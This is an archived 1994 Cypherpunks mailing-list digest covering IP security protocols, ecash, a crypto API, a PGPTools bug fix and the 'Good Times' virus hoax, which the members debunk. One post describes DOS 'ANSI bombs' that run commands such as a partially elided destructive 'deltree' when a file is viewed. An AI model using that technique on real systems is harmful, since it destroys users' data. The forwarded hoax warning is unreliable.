Subject: Dec. 10th Bay Area Cypherpunks Meeting In-Reply-To: <9412070836.ZM4161@wiley.sydney.sgi.com> Message-ID: <9412070253.AA07672@snark.imsi.com> Aren't there multicast provisions at SGI? Eric? .pm "Ian Farquhar" says: > On Dec 5, 10:28pm, KT Kislitzin wrote: > > This month's Bay Area Cypherpunks Meeting will be held this Saturday, > > December 10th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris > > (same cypher time, same cypher channel...). > > > > The topic for this month's discussions is: > > > > Technical Cryptography > > > > We have three speakers planned. > > [...] > > There isn't a chance that this could either be taped or broadcast, is there? > This sounds like it will be a fascinating meeting, and deserves a wider > audience. > > Ian. > From perry at imsi.com Tue Dec 6 18:59:16 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 6 Dec 94 18:59:16 PST Subject: swIPe In-Reply-To: <199412070044.SAA00308@omaha.omaha.com> Message-ID: <9412070257.AA07680@snark.imsi.com> Alex Strasheim says: > Has anything been happening with swIPe lately? I seem to remember reading > a couple of months ago that the protocol was being revised (simplified?) > and that a new RFC was going to be released soon. What's the status of > the project now? Asking this *during* the IETF meeting is bad timing. Ask the question again in a week... .pm From mab at crypto.com Tue Dec 6 19:12:24 1994 From: mab at crypto.com (Matt Blaze) Date: Tue, 6 Dec 94 19:12:24 PST Subject: swIPe In-Reply-To: <199412070044.SAA00308@omaha.omaha.com> Message-ID: <199412070313.WAA24449@crypto.com> >-----BEGIN PGP SIGNED MESSAGE----- > >Has anything been happening with swIPe lately? I seem to remember reading >a couple of months ago that the protocol was being revised (simplified?) >and that a new RFC was going to be released soon. What's the status of >the project now? > >== >Alex Strasheim | finger astrashe at nyx.cs.du.edu >alex at omaha.com | for my PGP 2.6.1. public key > >-----BEGIN PGP SIGNATURE----- >Version: 2.6.2 > >iQCVAwUBLuUFUREpP7+baaPtAQGKGQP/UN7bJfYOHIEdgV9uDnJLbJ00q4J/opLW >KpDxF+yl4Nhld70YkMQ/xJ9CeGh0mrCNLz/O8nD4KLrJ87RnH2T1fMV6vdegEvxF >CnDEOyRCSEa3kB3c1mkP5rtvW9PJF6GiqDkbaA86wa2usBkuv63mZjPc4EVLiZwY >+0xew1PgMQs= >=oHAW >-----END PGP SIGNATURE----- Well, if by swIPe you mean the standards-track IP security protocol, quite a bit. I'm not going to the next IETF meeting (perry?, phil?) but I understand that swIPe and friends have mutated into something that is very close to becoming an RFC. Key management is another story, with no general agreement as to what the requirements even are. My own feeling is that more experience is needed with network-layer security in general before the problems and tradeoffs of key managment in heterogeneous networks will emerge with any clarity. If you mean swIPe, the protocol described in Ioannidis and Blaze's draft RFC of last December, not much. There's an implementation floating around (I think on the ucb ftp server), but I don't know of anyone who's actively deploying it outside of closed systems. Now would is a very good time to play with this stuff, particularly with an eye toward understanding what the key management requirements are. Right now the future internet cryptographic security architecture is wide open, but that window is starting to close. -matt From ianf at sydney.sgi.com Tue Dec 6 19:37:18 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 6 Dec 94 19:37:18 PST Subject: Dec. 10th Bay Area Cypherpunks Meeting In-Reply-To: <9412070253.AA07672@snark.imsi.com> Message-ID: <9412071428.ZM14244@wiley.sydney.sgi.com> On Dec 6, 9:53pm, Perry E. Metzger wrote: > Aren't there multicast provisions at SGI? Eric? Yes, although many of us are at the end of links too slow to even get reliable audio, let alone video. Ian. From pstemari at fsp.fsp.com Tue Dec 6 19:48:55 1994 From: pstemari at fsp.fsp.com (Paul Ste. Marie) Date: Tue, 6 Dec 94 19:48:55 PST Subject: backing ecash In-Reply-To: <199412050431.WAA00176@omaha.omaha.com> Message-ID: <9412070347.AA11423@fsp.fsp.com> > Now obviously, things would work a lot more smoothly if you didn't need me > or my digital currency exchange. It would be nice if Bob and Alice could > buy and sell edollars from their banks online. But it's not essential. I Isn't there a problem with net-based distribution of ecash? It would seem that Eve could intercept the ecash and spend it first. Encrypted email return of the ecash would seem to violate the anonymity of the ecash. Some sort of one-time encrypted return address would seem to be necessary, but better yet would be a vending machine that took a floppy disk and some currency and stuck the ecash on the floppy. Paul From jrochkin at cs.oberlin.edu Tue Dec 6 20:17:13 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Tue, 6 Dec 94 20:17:13 PST Subject: backing ecash Message-ID: At 10:47 PM 12/06/94, Paul Ste. Marie wrote: >Isn't there a problem with net-based distribution of ecash? It would >seem that Eve could intercept the ecash and spend it first. Encrypted >email return of the ecash would seem to violate the anonymity of the >ecash. Some sort of one-time encrypted return address would seem to >be necessary, but better yet would be a vending machine that took a >floppy disk and some currency and stuck the ecash on the floppy. Diffie-Hellman would seem appropriate here. Look it up in Schneier. Vending machines seem a good idea too, but one unlikely to develop any time soon. Or possibly ever, if the net becomes so prevalent that no one would think of doing anything offline that could just as well be done online. From jya at pipeline.com Tue Dec 6 20:42:45 1994 From: jya at pipeline.com (John Young) Date: Tue, 6 Dec 94 20:42:45 PST Subject: (Fwd) Read this, Virus info!! Message-ID: <199412070447.XAA18944@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I have received two versions of this warning about "Good Times" virus, this one from mail list Design-L and a similar one from list Fiction-of-Philosophy. Some forwarded headers have been removed from this version. Has anyone on c'punks got further info or comment? John PGP 262 Key ID 34EE1095 - ------------------- Forwarding Design-L mail by: WAYDE at UTKVX.UTCC.UTK.EDU (Wayde Justin Tardif) on - ------------------- From: IN%"ripp0009 at frank.mtsu.edu" "Matthew D. Hamilton" 6-DEC-1994 22:42:53.89 To: IN%"xbuj17a at prodigy.com", IN%"agratz at aol.com", IN%"wayde at utkvx.utk.edu", IN%"hbaldry at utkvx.utk.edu" CC: Subj: Read this A.S.A.P.-- VIRUS (fwd) [Multiple headers elided] - ------------------- * WARNING * THere is a virus being sent on Online America by E-mail. If you get anything called "Good Times", DO NOT READ IT OR DOWNLOAD IT. I repeat, do not read it or download it. It is a virus that will earase your hard drive. Please forward this message to everyone you have an address for. It will help them a lot. ***************************************************************** ***** "We're going to play for you now a little Oriental song. It's called Tu Ning" ***************************************************************** ***** Raenna infinit at umich.edu - ------------------- End Forward - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuU+YSoZzwIn1bdtAQExhwGArGY8XPi++RcOQF67mN/o3dyPhZAmA2Pe 9WlSEtNQNno1y1JjFgXERUAG6CxVT19p =/0Vy -----END PGP SIGNATURE----- From pstemari at fsp.fsp.com Tue Dec 6 20:54:41 1994 From: pstemari at fsp.fsp.com (Paul Ste. Marie) Date: Tue, 6 Dec 94 20:54:41 PST Subject: GUCAPI (Grand Unified Crypto API) In-Reply-To: <9412062142.AA08621@homer.spry.com> Message-ID: <9412070454.AA12355@fsp.fsp.com> > I would be interested in seeing something like this implemented, but I > question whether it will be a hit as an industry standard. Generic API's > really haven't gone over well for things in the past. (Except the class > libraries for major C++ compilers. MFC, OWL, etc.) > The design has to be robust before you start coding. Something like this should be fairly reasonable to implement in C++. The basic concept would be to have a single public abstract class with a static method that takes a protocol name and returns a pointer to an encryption engine object that implements that protocol. The actual classes could either register themselves with the base class statically at link time or dynamically via DLL's or equivalent and an OS dependent config utility. The biggest question to my mind is how to handle key management and whether the engines should require blocks of an appropriate size (eg encrypt(size_t blksize, const char *inbuf, char *outbuf)) or act as pumps with user-specified data sources and sinks (eg encrypt(istream& input, ostream& output)). Paul From msanders at ataxia.res.wpi.edu Tue Dec 6 20:55:39 1994 From: msanders at ataxia.res.wpi.edu (Michael K. Sanders) Date: Tue, 6 Dec 94 20:55:39 PST Subject: (Fwd) Read this, Virus info!! In-Reply-To: <199412070447.XAA18944@bb.hks.net> Message-ID: <199412070503.AAA01081@ataxia.res.wpi.edu> -----BEGIN PGP SIGNED MESSAGE----- In the beginning there was nothing. Then John Young said: >-----BEGIN PGP SIGNED MESSAGE----- >I have received two versions of this warning about "Good Times" >virus, this one from mail list Design-L and a similar one from >list Fiction-of-Philosophy. Some forwarded headers have been >removed from this version. >Has anyone on c'punks got further info or comment? Yeah, I'm getting really fucking sick of it. This is about the dozenth copy of this silly thing I've received from various sources. As far as I'm concerned, the only 'virus' we have to worry about is the unrelenting propogation of that damn message. Has anyone actually seen this 'Good Times' thing? I highly doubt it. And seriously, an e-mail virus? Get real. - -- Michael K. Sanders -- msanders at ataxia.res.wpi.edu ataxia: NetBSD/Amiga 1.0 - Creating Chaos out of Anarchy for a Better Tomorrow Ataxia Home Page -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuVCBXT/GoKYNTJxAQE+yQQAk7h0dfXIkrBbY5+XCe6by9emrA64+qGd PoJVJsnWyZMqXFYVOlYTZbS9rZJVY+n8TvTGp90avLbvRZWBItB+JoqZdzb38TFB SnBSmXO0FtLGmtbcvymSTb1csv/5UfoVlwOHoMEn4lXhQca+7KpcV3XB2Ek0FBR3 Hn7gtH+CIZQ= =pVdG -----END PGP SIGNATURE----- From ianf at sydney.sgi.com Tue Dec 6 21:22:44 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 6 Dec 94 21:22:44 PST Subject: Read this, Virus info!! In-Reply-To: <199412070447.XAA18944@bb.hks.net> Message-ID: <9412071610.ZM10826@wiley.sydney.sgi.com> On Dec 6, 11:47pm, John Young wrote: > * WARNING * > > THere is a virus being sent on Online America by E-mail. If > you get anything called "Good Times", DO NOT READ IT OR > DOWNLOAD IT. I repeat, do not read it or download it. It is > a virus that will earase your hard drive. Please forward this > message to everyone you have an address for. It will help > them a lot. And pigs fly too. Ian. From perry at imsi.com Tue Dec 6 21:52:30 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 6 Dec 94 21:52:30 PST Subject: swIPe In-Reply-To: <199412070313.WAA24449@crypto.com> Message-ID: <9412070551.AA07757@snark.imsi.com> Matt Blaze says: > Well, if by swIPe you mean the standards-track IP security protocol, > quite a bit. I'm not going to the next IETF meeting (perry?, phil?) > but I understand that swIPe and friends have mutated into something > that is very close to becoming an RFC. True. > Key management is another story, with no general agreement as to > what the requirements even are. Less true; there are multiple proposals, but none of them meet my internal standards on what is needed :-) > My own feeling is that more experience is needed with network-layer > security in general before the problems and tradeoffs of key managment > in heterogeneous networks will emerge with any clarity. I would partially agree. We do have some actual real world experience with one key management and authentication system -- Kerberos. Its not sufficient, but it does provide a lot of interesting lessons. In particular, it has a distinct advantage over most the the currently proposed key management systems in the IETF: it is actually possible to write secure applications with Kerberos. (This is not as bad as it sounds; there are still ways to use the proposed key management systems (for setting up encrypted tunnels as an example) but these uses are more limited.) > If you mean swIPe, the protocol described in Ioannidis and Blaze's > draft RFC of last December, not much. There's an implementation > floating around (I think on the ucb ftp server), but I don't know > of anyone who's actively deploying it outside of closed systems. Actually, swIPe the implementation has been ported to three systems (largely berkeley clones) and is being actively sold as part of the TIS firewall product. However, its future with its current packet format is obviously limited. swIPe the packet format is quite dead, but swIPe the implementation will probably be hacked to support the IPSP protocol, whatever it ends up being in the end. > Now would is a very good time to play with this stuff, particularly with > an eye toward understanding what the key management requirements are. > Right now the future internet cryptographic security architecture is wide > open, but that window is starting to close. Quite true. Perry From GERSTEIN at SCSUD.CTSTATEU.EDU Tue Dec 6 22:03:52 1994 From: GERSTEIN at SCSUD.CTSTATEU.EDU (ADAM GERSTEIN, _THE_ MACGURU) Date: Tue, 6 Dec 94 22:03:52 PST Subject: Good times virus thing-a-ma-bobber Message-ID: <941207010448.20216805@SCSUD.CTSTATEU.EDU> Michael K. Sanders is believed to have said: >Has anyone actually seen this 'Good Times' thing? I highly doubt >it. And seriously, an e-mail virus? Get real. Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean anything to you? Sure, it wasn't actual email, but it did use email and other means of transport to cripple the net in a matter of hours. adam -=-=-=- Adam J. Gerstein MacGuru to the stars Available at: GERSTEIN at SCSU.CTSTATEU.EDU MACGEEK at SCSU.CTSTATEU.EDU A GERSTEIN at AOL.COM MACGEEK at eWorld.com an41389 at anon.penet.fi (for anonymity) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBWAwUBLq/fYbXVc2UFUOWNAQHu4QIBAQzD1aOCh4DV3Dg4DSJPmNu+1xGDRxND 0PavaUaBFP7GGT6EneTBwVX1ddL1PFFKdeMf8qo9FgWfG0EOHuHJTkY= =6rlg -----END PGP SIGNATURE----- From perry at imsi.com Tue Dec 6 22:10:41 1994 From: perry at imsi.com (Perry E. Metzger) Date: Tue, 6 Dec 94 22:10:41 PST Subject: Good times virus thing-a-ma-bobber In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU> Message-ID: <9412070610.AA07800@snark.imsi.com> "ADAM GERSTEIN, _THE_ MACGURU" says: > Need I remind you of a certain Robert T. Morris? Does the "Internet > Worm" mean anything to you? Sure, it wasn't actual email, but it did > use email and other means of transport to cripple the net in a > matter of hours. The similarity between the Morris worm and a "if you read it your computer will get cooties" virus is comparable to the distinction between an actual war and the film version of "Star Wars". .pm From msanders at ataxia.res.wpi.edu Tue Dec 6 22:24:05 1994 From: msanders at ataxia.res.wpi.edu (Michael K. Sanders) Date: Tue, 6 Dec 94 22:24:05 PST Subject: Good times virus thing-a-ma-bobber In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU> Message-ID: <199412070630.BAA02067@ataxia.res.wpi.edu> -----BEGIN PGP SIGNED MESSAGE----- In the beginning there was nothing. Then ADAM GERSTEIN, _THE_ MACGURU said: >Need I remind you of a certain Robert T. Morris?Does the "Internet Worm" mean >anything to you? Sure, it wasn't actual email, but it did use email and other >means of transport to cripple the net in a matter of hours. No, you don't, and yes, it does. But I hardly see the similarity. As you say, Morris' worm brought the net to its knees in a matter of hours, yet no _reliable_ source has even mentioned this supposed "Good Times" virus, let alone *seen* it. The message itself reeks of the typical chain letter-- oh please send this to absolutely everyone you know with email! It'll help them lots! Yeah, whatever. - -- Michael K. Sanders -- msanders at ataxia.res.wpi.edu ataxia: NetBSD/Amiga 1.0 - Creating Chaos out of Anarchy for a Better Tomorrow Ataxia Home Page -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuVWWnT/GoKYNTJxAQGgywQAl/bSiWSQw/KA50/X2AB0BIfedjFoQud0 O8ORbXCRtB40gcIWAbbgOxo9PEMuFXDktlexzxQB493ENHEWMT1PH+pjEI/jtgZP +lPgvNsxSeqOlhY3A7PCc9/u+lY8L2l0O96pnN7eWZ59nACgl4zaVvVIg0h2i8w8 /eiRPlqqaO4= =dsgZ -----END PGP SIGNATURE----- From claborne at microcosm.sandiegoca.NCR.COM Tue Dec 6 22:31:24 1994 From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris) Date: Tue, 6 Dec 94 22:31:24 PST Subject: Message-ID: <2EE554E4@microcosm.SanDiegoCA.NCR.COM> One of the reasons that Phil and Ralph get anything done is because they aren't subscribed to this list. Over 300 messages a week and growing.... How about cutting the flames, the Detweiler/DM junk, HEAT postings and post substantive info, questions, or discussion. 2 -- C -- ---------- >From: Anonymous User >--------------------------------------------------------------------------- --- >I don't know what is going on here. This list seems to have >bogged down in meta-issues. I am very disappointed with >Eric Hughes' recent display of feather-fluffing. He seems >to fail to understand that the list has absolutely NOTHING >to do with him personally. The full subscriber base could >MOVE IMMEDIATELY if so inclined, and indeed the atmosphere >seems to be getting a bit oppressive here. > >I hate to say this but it reminds me of when all the Detweiler >flames were erupting a long time ago. Detweiler seemed to >be especially enraged with the way that E.Hughes ran the list >in a dictatorial, "iron fist" way. He failed to understand >that his own role was merely that of a janitor, not a >celebrity with a personality cult. Is that all the cypherpunks >list is about? I tell you that this idea that "cypherpunks >code" does not mean anything. "cypherpunks talk about code >endlessly" but when it comes down to it, this whole list >is nothing but a lot of people STROKING EACH OTHER'S EGOS >while the outsiders (Phil Zimmermann, Ralph Levien) are the >only ones getting anything done!! > > From nobody at c2.org Tue Dec 6 22:52:43 1994 From: nobody at c2.org (nobody at c2.org) Date: Tue, 6 Dec 94 22:52:43 PST Subject: good times Message-ID: <199412070650.WAA05487@infinity.c2.org> fnord -23 From jcorgan at netcom.com Tue Dec 6 22:58:15 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Tue, 6 Dec 94 22:58:15 PST Subject: Ideal digital cash system? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On page 123 of Applied Cryptography Bruce Schneier cites the work of two cryptographers and the digital cash system they invented that satisfies all six properties he listed on the same page. In his words: The authors consider this the first ideal untraceable electronic cash system. The reference [674] is: T. Oamoto and K. Ohta, Universal Electronic Cash Advances in Cryptology--CRYPTO '91 Proceedings Berlin: Springer-Verlag 1992 pp. 324-337 Is anyone here familiar with this work? Has anyone tried to implement this protocol in some manner? Also how would I go about obtaining the text of this work either in written form or online? ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuVcyU1Diok8GKihAQGuIwP+KaH0arHX1MADCi+KHMWjSCq3VNoUR1O1 aIBagedXbegdXmzkcmdTebgfKYQKpZN3Ple8Bt1k3KzXepS/gcIZUGWeN7P5c+tC 2/zFbTLYhl+BCjZpRZ2PnxTZWYASUYoKnZ1sXeh18bYPxtR+g9BSCmleau1W5d/g yAi2QSuxdBg= =gTBc -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Tue Dec 6 23:00:32 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 6 Dec 94 23:00:32 PST Subject: "Virus Alert" chain letter Message-ID: <199412070700.CAA10366@ducie.cs.umass.edu> -----BEGIN PGP SIGNED MESSAGE----- Dear AOL Postmaster: The message below has apparently been circulating quite widely. Personally I doubt the authenticity of the claim, and strongly suspect that it's just an annoying attempt to create a chain letter. In any event, it would be handy to hear some sort of statement from AOL about this matter to stem the tide of largely unproductive speculation on various mailing lists. I'm cc:ing this to the cypherpunks list , and encourage you to cc: your reply to the list. I recommend posting some sort of announcement to the comp.virus newsgroup as well. Thanks very much for your time. - -L. McCarthy Forwarded message: > Subj: Read this A.S.A.P.-- VIRUS (fwd) > > * WARNING * > > THere is a virus being sent on Online America by E-mail. If > you get anything called "Good Times", DO NOT READ IT OR > DOWNLOAD IT. I repeat, do not read it or download it. It is > a virus that will earase your hard drive. Please forward this > message to everyone you have an address for. It will help > them a lot. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuVdWGf7YYibNzjpAQHivQQAi8XCc4BMXVM70wDio2UZHcm7frLtmHc/ yR8ym75pKZbuN5f69MiN+OAYsV5l33TsJFIJ6Z8nEgzQwyF4a04NLfLLWNmm7CwG IX3Dc6oJhgv3xDp/o+Y8MsJyyqKRrEeXP0UcLWt/lG71dK6TSpS6TwlF38OnY/v4 ykJvT4qII2M= =3a+r -----END PGP SIGNATURE----- From ianf at sydney.sgi.com Tue Dec 6 23:08:02 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Tue, 6 Dec 94 23:08:02 PST Subject: Good times virus thing-a-ma-bobber In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU> Message-ID: <9412071802.ZM15418@wiley.sydney.sgi.com> On Dec 7, 1:04am, ADAM GERSTEIN, _THE_ MACGURU wrote: > Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean > anything to you? Sure, it wasn't actual email, but it did use email and other > means of transport to cripple the net in a matter of hours. The Internet Worm used the sendmail DEBUG mode to execute commands on a remote system. It did not propogate itself via email messages, which was what the original (ridiculous) warning claimed. I can't feel a lot of sympathy for people who took this announcement seriously. Such stupidity reaps its own rewards. Ian. From suter at crl.com Tue Dec 6 23:22:46 1994 From: suter at crl.com (Edgar A. Suter) Date: Tue, 6 Dec 94 23:22:46 PST Subject: Announcing - The DigitaLiberty Forum In-Reply-To: <9412062258.AA23412@dockmaster.phantom.com> Message-ID: I am certain that the nattering nabobs of negativism would take issue with the mainstream miasma of majoritarianism. ************************************************************************* * Edgar A. Suter, MD suter at crl.com * * Chair, DIRPP Doctors for Integrity in Research & Public Policy * ************************************************************************* From adam.philipp at ties.org Tue Dec 6 23:37:21 1994 From: adam.philipp at ties.org (Adam Philipp) Date: Tue, 6 Dec 94 23:37:21 PST Subject: Good times virus (ANSI BOMB?) Message-ID: <199412070742.CAA21434@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- >On Dec 7, 1:04am, ADAM GERSTEIN, _THE_ MACGURU wrote: >> Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" >mean >> anything to you? Sure, it wasn't actual email, but it did use email and other >> means of transport to cripple the net in a matter of hours. > >The Internet Worm used the sendmail DEBUG mode to execute commands on >a remote system. It did not propogate itself via email messages, which was >what the original (ridiculous) warning claimed. > >I can't feel a lot of sympathy for people who took this announcement >seriously. Such stupidity reaps its own rewards. Although the concept of "text viruses" seems a bit far fetched to some people, there these lovely toys known as ANSI bombs. Essentially they work in a similar method to the some techniques used in the sendmail bug, but they are MS-DOS specific, they will use embedded ANSI codes to run programs as the files is viewed... anyone know what will happen if deltree /XXX (where XXX represents an unpublished string of characters) is run from the root directory of a DOS hard disk? Its gone, quickly. Sure the files can be undeleted, but undeleting a whole disk is tricky business... Maybe Good Times is a hoax, but ANSI bombs exist and using a DOS ANSI text viewer will surely be a foolish thing to do on any downloaded text file... If anyone feels the need for proof I collected a few a while back, but really don't see the need to post them...heh heh. Adam Philipp PS: Please no comments about superiority of MACs or LINUX boxs because they are immune to ANSI boms...that ought to be clear enough... - -- PGP Key available on the keyservers. Encrypted E-mail welcome. SUB ROSA: Confidential, secret, not for publication. -Black's Law Dictionary GJ/CS d H S:+ g? p? au+ a- w+ v++ c++ UL+ UU+ US+ P+ 3 E N++ k- W++ M-- V po- Y++ t++ 5+ jx R G' tv+ b+++ D++ B--- E+++ u** h-- f++ r+ n+ y++-- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuVnPSoZzwIn1bdtAQEjeAF+Pi65kg9SMBZ1bzO5gJBsumi5x2vJFgqC o0hc3bMaqLYb5WY/jlaAtWURtzXzOUc6 =/53s -----END PGP SIGNATURE----- From anonymous-remailer at xs4all.nl Wed Dec 7 00:08:11 1994 From: anonymous-remailer at xs4all.nl (Name withheld on request) Date: Wed, 7 Dec 94 00:08:11 PST Subject: PGPTools bug Message-ID: <199412070809.AA01450@xs1.xs4all.nl> -----BEGIN PGP SIGNED MESSAGE----- This is a known problem in old versions, caused by this bug in fifo_destroy. while(fb) { nfb=fb; fifo_block_unlink(fb); /* Free the block */ fb=nfb->next; /* And then read it...oops */ } It's fixed like this in later versions. while(fb) { nfb=fb->next; fifo_block_unlink(fb); fb=nfb; } Get the latest version (10d I think) from ftp.csn.net, and download a file called pgptlupd.zip. The update has the fixed fifo, among other things. Don't use the earlier versions. They have bugs. Get my latest release, not one that has been hacked by someone else. Pr0duct Cypher -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuPbScGoFIWXVYodAQEtSQP/YepqB2czl4/7keW8R6KMrnI2YVnvqPBJ ENXi+Ds3TGFHazdskofjra1Dwu8I2tkrH61n0YDrHRwvlZUVFxpqGW+zPamLlhNG NPdQKabtT79qXQYNCxR8KrYZnpS3p21io5nVmYduOkW0ZqvTyo2cX8iKGsDXeBpV 3idSCI+ZTr8= =lXLl -----END PGP SIGNATURE----- From skaplin at skypoint.com Wed Dec 7 00:25:12 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Wed, 7 Dec 94 00:25:12 PST Subject: Anybody got a procmail recipe? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Does anyone have a procmail recipe which will forward all incoming mail messages to a shell account to a specific usenet news group? Thanks, Sam ============================================================================== Liberty doesn't work as well in practice as it does in speeches. --Will Rogers-- ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLuVwEMlnXxBRSgfNAQGICgf+LToVhwIjeL8GlaGQjk4BmqTLML/E08UB EIAHk9yWmpZxq8L7zCHETBeDANgEvwpYR/q+/CQ3LDNPF8BmNk15zwTxIaQpp78O QI1ppFbL+hwq0a3jTJ+3YaHoPWOKDGNt/C48InyxV/B2hfwwRv0i8N9YnR714Z29 H36xICgtHyNtiIKte5cCH86Z5rVqsGrgABEpPNckddiRy5OkMFVFgJQOtkuxbAxN 8sjaeLLqsfrbwu+kx+fdSpVHxbfKFAIYIK5PUnadHqhCbfM9vHMMEQMJ3azrbisi 06Xfe9vfoQAP4yWySNCvDJgle1wqAQxWMUsKZQauceZOtLYhiMfAEw== =k6K+ -----END PGP SIGNATURE----- This message digitally signed to verify the identity of the writer. From lmccarth at ducie.cs.umass.edu Wed Dec 7 00:45:32 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 7 Dec 94 00:45:32 PST Subject: Anybody got a procmail recipe? Message-ID: <199412070850.DAA29419@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Sam Kaplin writes: > Does anyone have a procmail recipe which will forward all incoming mail > messages to a shell account to a specific usenet news group? Couldn't you just use, for example, soc.singles at myriad.pc.cc.cmu.edu as the contents of your .forward file ? - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuV2EGf7YYibNzjpAQFKwwP+JfZabMUdW4ZjOwlJmFdXibXTW725baok xAIKMLl4zti8BvM90YpdYy5ILps9JR4W+XE8deHfhwRjti0sim7bt43Vgp8V3a2z DwrAXb0B20xpPgAH3XotIVCVYb0rTGy5LsHk2NBU9K/Ufvx2RyGLB8d2nvqaqCW5 yjhR6/JBJ+Q= =/FT8 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuV3QSoZzwIn1bdtAQES8AF+OIvMZrlwK2pdU5nCCawU93M/j1kbs2Ye DYR/7GKWphvABSWBE2/lcOvkCJUT+zfZ =j1pP -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Wed Dec 7 01:10:11 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Wed, 7 Dec 94 01:10:11 PST Subject: Steven Levy on Fresh Air (NPR) Message-ID: <199412070915.EAA29607@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Steven Levy discussed key escrow with Terry Gross on NPR's Fresh Air today (the show originates at WHYY-FM in Philadelphia). Unfortunately I only caught the tail end of the interview, as I happened to flip to the local public radio station driving home. He drew the analogy between Clipper/EES and being required to leave a key to the "strong door" of one's house at the local police station. Towards the end he specifically mentioned the cypherpunks as a group working against this sort of encroachment on privacy. Perhaps someone could fill in more details from the beginning of the conversation ? - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuV75Gf7YYibNzjpAQGWpQQAxbWgJMFEJ7eNv6NwaFg9eHSVGX04Ha8F MEopRwImJNIhEoKs9K9ORzujXiCpI6TGQ4JKe7JSxLDJ+W0hwzCOsGCxLHV4jGrx MbC/dNrxHL5pDZvobKPbwO8khxx3oIqArv3vskYfqY1qomrqcTDFdjbZeCFcHrvD HMwzIRPT3Xo= =4aOl - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuV9DioZzwIn1bdtAQEb9gGAki5DmoHGeBRxwdHqzB+GHSQVl/6kpK9h Wh39toG7c741opNtZl56XjGpbTVd0u3z =R4OO -----END PGP SIGNATURE----- From jdwilson at gold.chem.hawaii.edu Wed Dec 7 01:39:12 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Wed, 7 Dec 94 01:39:12 PST Subject: Good times virus thing-a-ma-bobber In-Reply-To: <941207010448.20216805@SCSUD.CTSTATEU.EDU> Message-ID: On Wed, 7 Dec 1994, ADAM GERSTEIN, _THE_ MACGURU wrote: > Michael K. Sanders is believed to have said: > > >Has anyone actually seen this 'Good Times' thing? I highly doubt > >it. And seriously, an e-mail virus? Get real. > > > Need I remind you of a certain Robert T. Morris? Does the "Internet Worm" mean > anything to you? Sure, it wasn't actual email, but it did use email and other > means of transport to cripple the net in a matter of hours. > > adam > > -=-=-=- > Adam J. Gerstein > MacGuru to the stars According to CIAC: From root at phantom.com Wed Dec 7 02:15:18 1994 From: root at phantom.com (Operator) Date: Wed, 7 Dec 94 02:15:18 PST Subject: Announcing - The DigitaLiberty Forum Message-ID: <199412062156.QAA06097@mindvox.phantom.com> PLEASE 